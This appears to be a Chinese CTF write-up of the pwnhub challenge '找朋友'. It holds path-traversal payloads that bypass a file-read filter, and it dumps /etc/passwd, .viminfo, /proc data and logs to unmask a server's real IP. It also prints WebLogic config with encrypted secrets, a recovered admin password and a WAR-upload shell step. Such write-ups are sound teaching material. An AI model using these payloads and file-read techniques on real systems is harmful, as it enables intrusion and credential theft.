前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >pwnhub_找朋友

pwnhub_找朋友

作者头像
LoRexxar
发布于 2023-02-21 07:40:10
发布于 2023-02-21 07:40:10
40500
代码可运行
举报
文章被收录于专栏:LoRexxar's BlogLoRexxar's Blog
运行总次数:0
代码可运行

先膜tomato师傅出的题,偷马桶师傅出的题一直都是渗透思路,这点我是服的,顺手膜小m…因为在找真是ip这一步我花了十几个小时都失败了,当时的思路还留在博客里,算是个纪念吧…

首先下载下来判断文件类型是一个win程序,猜测是类似于木马样式,于是虚拟机打开抓包,发现了请求向http://shell.pwnme.site,但是无论通过whois反查还是别的,都没有收获,那么唯一的思路是扫子域名。

于是扫一波域名找到了http://blog.pwnme.site,一个python的站,有一些信息: 1、存在登陆注册,user_login和user_register,登陆后从源码里看到了file_download 2、file_download可以读文件,我们找到了web.pyconfig.py,然后找到了models.py,但是没有找到任何收获。 3、阅读源码发现读文件可以绕过,filename=templates/../../../../../etc/hosts,但是没有任何想法,这里猜测有别的站,但是百度云加速过了cdn,我们没办法得到真实ip。 (1)在没有任何cve和特殊漏洞影响下,我们获取真实ip的唯一办法应该是ssrf,但是我们有能力读文件,那么什么文件会记录请求的ip的。 (2)有个新想法,dns历史解析

这里走了太远的弯路,最开始读文件的时候/etc/passwd被过滤了,但是没觉得有什么太大的影响,所以也就没想着绕,阅读得到很多信息,这里有两种绕过方式

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
filename=templates/../../../../../etc/./././passwd
和
filename=templates/../../../../../etc/passwd&filename=config.py
python和php解析参数不一样,不存在什么参数覆盖的影响。

得到

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
lxd:x:106:65534::/var/lib/lxd/:/bin/false
messagebus:x:107:111::/var/run/dbus:/bin/false
uuidd:x:108:112::/run/uuidd:/bin/false
dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin
pollinate:x:111:1::/var/cache/pollinate:/bin/false
ubuntu:x:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
mysql:x:112:117:MySQL Server,,,:/nonexistent:/bin/false
bl4ck:x:1001:1001:bl4ck,,,:/home/bl4ck:/bin/bash
oracle:x:1002:1002::/u01/oracle:/bin/bash

其实有很多信息,首先就是存在bl4ck用户,读这个用户的.viminfo.bash_history是很顺手的想法,得到

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
# Jumplist (newest first):
-'  1  27  /tmp/aa.py
-'  2  17  /tmp/aa.py
-'  8  8  ~/blog/web.py
-'  1  0  ~/blog/web.py
-'  2  15  /u0/oraInst.loc
-'  1  0  /u0/oraInst.loc
-'  14  0  ~/weblogic/container-scripts/create-wls-domain.py
-'  1  0  ~/weblogic/container-scripts/create-wls-domain.py
-'  2  15  ~/weblogic/oraInst.loc
-'  1  0  ~/weblogic/oraInst.loc
-'  37  3  ~/blog/web.py
-'  2  15  ~/weblogic/oraInst.loc

这里发现除了web意外,还有weblogic,但是我们访问的blog.pwnme.site是过cdn的,那么问题又回到了最关键的部分,怎么得到服务器的真实ip

这里第一种是我上面提到的思路,就是找flask的日志,但是實在是孤陋寡闻了,这里没想到去读系统日志,再加上之前花了大量的时间去pwn题扫配置文件,包括各种proc下的东西,回到web题目的时候已经没想那么多了,当时稍微试了一下/proc/self/fd/1就没测试了。

关于proc的东西就不多说了,之前ph师傅发过

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
- /proc/mounts 文件系统列表
- /proc/cpuinfo CPU信息
- /proc/meminfo 内存信息
- /proc/self -> 指向 /proc/[当前进程pid]
- /proc/[pid]/cmdline 进程启动参数(可以获取一些敏感信息,如redis密码等)(可以跨进程,如pid=1的进程/proc/1/cmdline)
- /proc/[pid]/mountinfo 文件系统挂载的信息(可以看到docker文件映射的一些信息,如果是运行在容器内的进程,通常能找到重要数据的路径:如配置文件、代码、数据文件等)
- /proc/[pid]/fd/[fd] 进程打开的文件(fd是文件描述符id)
- /proc/[pid]/exe 指向该进程的可执行文件

更多详情可以参考linux文档 链接:proc(5) - Linux manual page

还提到了关于标准输入输出的问题,也就是/proc/self/fd/1

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
和docker有关的(但不仅限于docker,比如扩展到supervisord也行得通)。大家知道,文件描述符0是标准输入、1是标准输出、2是标准错误,docker打开的web进程很可能是会将浏览记录和错误记录都输出在1里),甚至包括一些敏感信息(比如启动进程的时候输出一下配置信息什么的)。这时候多读取一下/proc/self/fd/1会有一些不一样的发现。

向ph师傅低头学习新姿势…

/proc/self/fd/4得到

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
222.128.2.100 - - [15/Dec/2016:02:41:53 +0000] "GET / HTTP/1.1"  200 2821 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
222.128.2.100 - - [15/Dec/2016:02:41:54 +0000] "GET /static/img/favicon.png HTTP/1.1"  200 - "http://blog.pwnme.site/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
222.128.2.100 - - [15/Dec/2016:02:41:54 +0000] "GET / HTTP/1.1"  200 2821 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.95 Safari/537.36"
222.128.2.100 - - [15/Dec/2016:02:41:54 +0000] "GET /static/img/favicon.png HTTP/1.1"  200 -
...
HTTP/1.1"  404 1285 "http://54.223.115.219/phpmyadmin/index.php" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)"

找到真实iphttp://54.223.115.219

这里tomato师傅给出了第二种解决办法,也就是我一直研究的获取dns解析历史记录,但我找到很多站都搜索不到,tomato给出了一个别的办法 https://passivetotal.org

https://lorexxar-blog.oss-cn-shanghai.aliyuncs.com/zybuluo-backup/LoRexxar/2jdv55tovcw7smtqy90anxm0/1.png

只能瑟瑟发抖,这个结果我只在who.is和domaintools上搜到了,但都是收费的,没什么办法。

拿到真实ip,开始日weblogic。 http://54.223.115.219:7001/console

首先是想办法登陆,这里主要是两篇文章 http://bobao.360.cn/learning/detail/337.html

http://www.cnblogs.com/sevck/p/5729663.html

首先我们需要找到SerializedSystemIni.dat这个文件,那么这里选择先去读启动命令,在/proc/sched_debug里面找到

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
startWebLogic.s 13529    941778.614566         6   120         0.313721         1.292801         1.514692 0 0 /user.slice
startWebLogic.s 13530    941877.533691        63   120         0.036939         3.371997        41.001105 0 0 /user.slice

找到weblogic的进程号,得到

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
/u01/oracle/user_projects/domains/base_domain/bin/startWebLogic.sh

然后读配置文件

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
/u01/oracle/user_projects/domains/base_domain/config/config.xml


<?xml version='1.0' encoding='UTF-8'?>
<domain xmlns="http://xmlns.oracle.com/weblogic/domain" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd">
  <name>base_domain</name>
  <domain-version>12.2.1.2.0</domain-version>
  <security-configuration>
    <name>base_domain</name>
    <realm>
      <sec:authentication-provider xsi:type="wls:default-authenticatorType">
        <sec:name>DefaultAuthenticator</sec:name>
      </sec:authentication-provider>
      <sec:authentication-provider xsi:type="wls:default-identity-asserterType">
        <sec:name>DefaultIdentityAsserter</sec:name>
        <sec:active-type>AuthenticatedUser</sec:active-type>
        <sec:active-type>weblogic-jwt-token</sec:active-type>
      </sec:authentication-provider>
      <sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-role-mapperType">
        <sec:name>XACMLRoleMapper</sec:name>
      </sec:role-mapper>
      <sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-authorizerType">
        <sec:name>XACMLAuthorizer</sec:name>
      </sec:authorizer>
      <sec:adjudicator xsi:type="wls:default-adjudicatorType">
        <sec:name>DefaultAdjudicator</sec:name>
      </sec:adjudicator>
      <sec:credential-mapper xsi:type="wls:default-credential-mapperType">
        <sec:name>DefaultCredentialMapper</sec:name>
      </sec:credential-mapper>
      <sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType">
        <sec:name>WebLogicCertPathProvider</sec:name>
      </sec:cert-path-provider>
      <sec:cert-path-builder>WebLogicCertPathProvider</sec:cert-path-builder>
      <sec:name>myrealm</sec:name>
      <sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator" xsi:type="pas:system-password-validatorType">
        <sec:name>SystemPasswordValidator</sec:name>
        <pas:min-password-length>8</pas:min-password-length>
        <pas:min-numeric-or-special-characters>1</pas:min-numeric-or-special-characters>
      </sec:password-validator>
    </realm>
    <default-realm>myrealm</default-realm>
    <credential-encrypted>{AES}R/snIxxgRcp1CI5RAFqSfwD4c5tMvE/a63UivPEAj3v+8uf8y0X7OVZQj2wtJyWQDKK3Lz4jCdLrcASoqJ57H6GRBxsHm7wB64XPfploVqSpuBznH3dNWvMIig3I7cIK</credential-encrypted>
    <node-manager-username>weblogic</node-manager-username>
    <node-manager-password-encrypted>{AES}0N0Z2hoc1/b/72xxMrai1uG48m4LA6iIskgeu7ZUWaFbAWWcwoDSZo0RL8ANnCKG</node-manager-password-encrypted>
  </security-configuration>
  <server>
    <name>AdminServer</name>
    <listen-address></listen-address>
  </server>
  <production-mode-enabled>true</production-mode-enabled>
  <embedded-ldap>
    <name>base_domain</name>
    <credential-encrypted>{AES}rcUpHoOEV8A6SSJspFM503PXtD1cOtBt4e3yewh94oA+ptKSL5XTLbIh1lXZygTP</credential-encrypted>
  </embedded-ldap>
  <configuration-version>12.2.1.2.0</configuration-version>
  <app-deployment>
    <name>1</name>
    <target>AdminServer</target>
    <module-type>war</module-type>
    <source-path>servers/AdminServer/upload/1.war/app/1.war</source-path>
    <plan-dir>servers/AdminServer/upload/1.war/plan</plan-dir>
    <plan-path>Plan.xml</plan-path>
    <security-dd-model>DDOnly</security-dd-model>
    <staging-mode xsi:nil="true"></staging-mode>
    <plan-staging-mode xsi:nil="true"></plan-staging-mode>
    <cache-in-app-directory>false</cache-in-app-directory>
  </app-deployment>
  <app-deployment>
    <name>1-1</name>
    <target>AdminServer</target>
    <module-type>war</module-type>
    <source-path>servers/AdminServer/upload/1.war/app/1.war</source-path>
    <plan-dir>servers/AdminServer/upload/1.war/plan</plan-dir>
    <plan-path>Plan.xml</plan-path>
    <security-dd-model>DDOnly</security-dd-model>
    <staging-mode xsi:nil="true"></staging-mode>
    <plan-staging-mode xsi:nil="true"></plan-staging-mode>
    <cache-in-app-directory>false</cache-in-app-directory>
  </app-deployment>
  <app-deployment>
    <name>1-2</name>
    <target>AdminServer</target>
    <module-type>war</module-type>
    <source-path>servers/AdminServer/upload/1.war/app/1.war</source-path>
    <plan-dir>servers/AdminServer/upload/1.war/plan</plan-dir>
    <plan-path>Plan.xml</plan-path>
    <security-dd-model>DDOnly</security-dd-model>
    <staging-mode xsi:nil="true"></staging-mode>
    <plan-staging-mode xsi:nil="true"></plan-staging-mode>
    <cache-in-app-directory>false</cache-in-app-directory>
  </app-deployment>
  <admin-server-name>AdminServer</admin-server-name>
  <resource-group>
    <name>GlobalResourceGroup-0</name>
  </resource-group>
</domain>

找到账号密码

代码语言:javascript
代码运行次数:0
运行
AI代码解释
复制
weblogic/a84cb51a0c33a4db

这里思路就是很普通的传war拿shell,启动然后getshell,找到flag在/u01/里,差不多就这样。

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2016/12/18,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
暂无评论
推荐阅读
terraform 入门:创建腾讯云 k8s 集群
本文适合不喜欢在浏览器中点点点,并刚刚入门或者想要入门 terraform 的小伙伴。
谢正伟
2021/08/05
4.1K0
terraform 入门:创建腾讯云 k8s 集群
如何高效的进行腾讯云上的资源编排,一起来聊一聊Terraform
“腾讯云IaC最佳实践”系列文章希望通过介绍Terraform、Chef和Ansible等生态产品工具及相关案例,使用户能够更好地在腾讯云上实践IaC,为腾讯云用户提供增值服务。本文是“腾讯云IaC最佳实践”系列文章的第1篇。
生态产品团队
2019/07/22
18.7K4
Terraform系列二腾讯云CVM进一步相关玩法
紧接Terraform系列一腾讯云CVM相关简单创建。准备围绕着cvm先熟悉一下基本的流程。比如:系统盘扩容,挂载数据盘,帐号密钥ssh-key,绑定公网ip.研究一下官方文档体验一下!
对你无可奈何
2022/03/31
2.6K1
怎样用terraform管理现存资源
通过阅读前面几篇文章,希望大家了解了基础架构及代码的基本概念,以及如何使用packer和terraform在腾讯云上进行新云资源的高效编排。但是在现实世界里,云管理团队还要管理以前那些没有通过terraform管理的资源,本文会作出一个通用流程,方便大家使用。
刘宇雷
2019/08/21
3.4K0
怎样用terraform管理现存资源
如何把控制台上已有的资源导入terraform
对于老用户,常常有把控制台上已有的资源导入terraform的需求。本篇以把控制台上已有的eip资源为例,介绍如何导入已有资源到terraform编排中。同时将该资源与tf中创建的NAT网关相绑定。
王罡
2019/11/22
3.9K0
如何把控制台上已有的资源导入terraform
如何利用Terraform工具编排管理TcaplusDB
Terraform是国外很流行的资源编排工具,具体介绍可查看Hashicorp官网。TIC是腾讯云基于Terraform打造一款免费服务,可为不同云平台的基础架构资源提供易用、高效、安全的统一资源编排管理平台,通过使用声明型语言,兼容众多优秀的开源社区工具,同时提供代码编辑和视图编辑两种模式,有效降低学习成本和使用难度。TIC 使用代码版本管理的方式管理基础架构,保障基础设施的构建、管理和迁移的可靠性和安全性。具体产品介绍可参考TIC官网。TcalplusDB是腾讯去推出的一款全托管NoSQL数据库服务,可为用户提供高性能、低成本、易扩展、稳定、安全的存储服务,目前广泛应用于王者荣耀、刺激战场、穿越火线、火影忍者等数百款流行游戏,具体产品能力介绍可参考另一篇文章《腾讯云TcaplusDB基础能力介绍》。
温球良
2020/08/01
1.2K0
如何利用Terraform工具编排管理TcaplusDB
腾讯云Terraform应用指南(一)
《腾讯云Terraform应用指南》系列文章旨在帮助腾讯云用户借助Terraform,轻松使用简单模板语言来定义、预览和部署云基础结构,让用户通过IaC,基于腾讯云的OpenAPI一键创建或销毁多路资源。利用Terraform这把利器,帮助用户节约资源开销,提高从部署到运维的自动化生产力。
生态产品团队
2019/07/26
20.1K5
Terraform开启本地日志跟踪以及问题自查
|本文以tencentcloud terraform 为例,介绍使用terraform CLI过程中如何开启本地日志跟踪以及一些通用问题的自查方法
Sesede_被告警吵醒
2021/02/26
2K0
Terraform开启本地日志跟踪以及问题自查
TF在腾讯云创建mysql跨可用区只读实例
vpc、subnet、安全组等参考官方文档创建,主实例用广州地域的,只读实例使用上海的
arunma
2025/02/28
2630
TF在腾讯云创建mysql跨可用区只读实例
Terraform系列一腾讯云CVM相关简单创建
记得2019左右就看到过Terraform系列的文章和书籍,当时所有的业务都上云了管理也很是方便,看了一眼就没有作过多的研究。但本着对技术发展的前瞻敏锐性, 还是觉得这个东西是会火起来的。正巧最近泽阳大佬devops训练营https://www.yuque.com/devopsvip穿插上了Terraform!个人又开始体验了一把......
对你无可奈何
2022/03/30
4.2K5
terraform简单的开始-vpc cvm创建
一个 resource 块包含 resource 关键字、资源类型、资源名和资源块体三部分。这是terraform中创建资源常用的格式!
对你无可奈何
2023/09/20
6330
腾讯云支持 Terraform 开发实践
这篇文章从系统架构开始,到核心库讲解,到实践开发,再到单元测试,比较完整的描述了支持Terraform的开发全过程。
Techeek
2018/03/20
21K11
腾讯云支持 Terraform 开发实践
使用 Packer 创建镜像
HashiCorp 是一家国外基础软件提供商,主要开发支持多云部署的开源工具,旗下有6 款主流软件,Terraform、Consul、Vagrant、Nomad、Vault、Packer
Windows技术交流
2023/06/16
8950
Terraform资源定义梳理
资源是Terraform体系中最重要的组成元素, 每个资源块用来定义一个或多个基础产品实例, 它或者定义一个VPC,或者定义一个CVM或者一条DNS记录.
乔碧萝殿下
2019/12/27
6.8K1
通过terraform快速创建腾讯云基础资源
Terraform是一个IT基础架构自动化编排工具,可以用代码来管理维护IT资源。它编写了描述云资源拓扑的配置文件中的基础结构,例如虚拟机、存储账户和网络接口。Terraform的命令行接口(Command Line Interface,CLI)提供一种简单机制,用于将配置文件部署到腾讯云或其他任意支持的云上,并对其进行版本控制。
Vicwan
2020/03/12
8.4K0
Terraform语法入门
HCL是Terraform的配置语言,它是HashiCorp发明的一种声明式语言,能够以更加简短和人性化的方式来描述资源。本文主要介绍HCL配置语言的基本语法及使用,语法采用当前最新版本0.12。
oliverpei
2020/03/17
8.6K2
转载:《如何高效的进行腾讯云上的资源编排,一起来聊一聊Terraform》的几点补充说明
本文为HashiCorp公司亚太区架构师Liu Yulei先生原创。在阅读完专栏文章《如何高效的进行腾讯云上的资源编排,一起来聊一聊Terraform》后,Liu Yulei根据客户实践案例,对文中一些遗漏之处进行了补充说明,原文发表于github上,现转载过来供大家参考。
腾讯云-CEDRIC
2019/07/23
1.3K0
Terraform + Gitlab CI简单集成方案
利用Gitlab CI实现基础设施编排自动化,用户后续针对基础设施的管理使用Gitlab完成,提交基础设施变更后,会出发pr进行Gitlab CI流水线执行,从而实现基础设施DevOPS流程。
每周聚焦
2022/07/06
1K0
Terraform + Gitlab CI简单集成方案
Terraform—基础设施即代码(Iac)
IAC(基础设施即代码),是指通过编写代码来进行基础设施的定义,部署,更新与销毁。让基础设施的变更同代码一样,具有版本控制的能力,同时可以通过codeReview 进行审阅,保障其可靠性与一致性。只需要做好基础设施可变与不可变部分的划分,即可通过流水线工具及相关策略对可变部分进行动态调整,完成基础设施的自动化编排与管理。
tunsuy
2023/10/23
5410
Terraform—基础设施即代码(Iac)
Terraform:高效定义、启动和管理
视频:https://www.youtube.com/playlist?list=PLeLcvrwLe184_AH9mfXGn20EecskV6qaU
yeedomliu
2024/03/06
2370
Terraform:高效定义、启动和管理
推荐阅读
相关推荐
terraform 入门:创建腾讯云 k8s 集群
更多 >
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档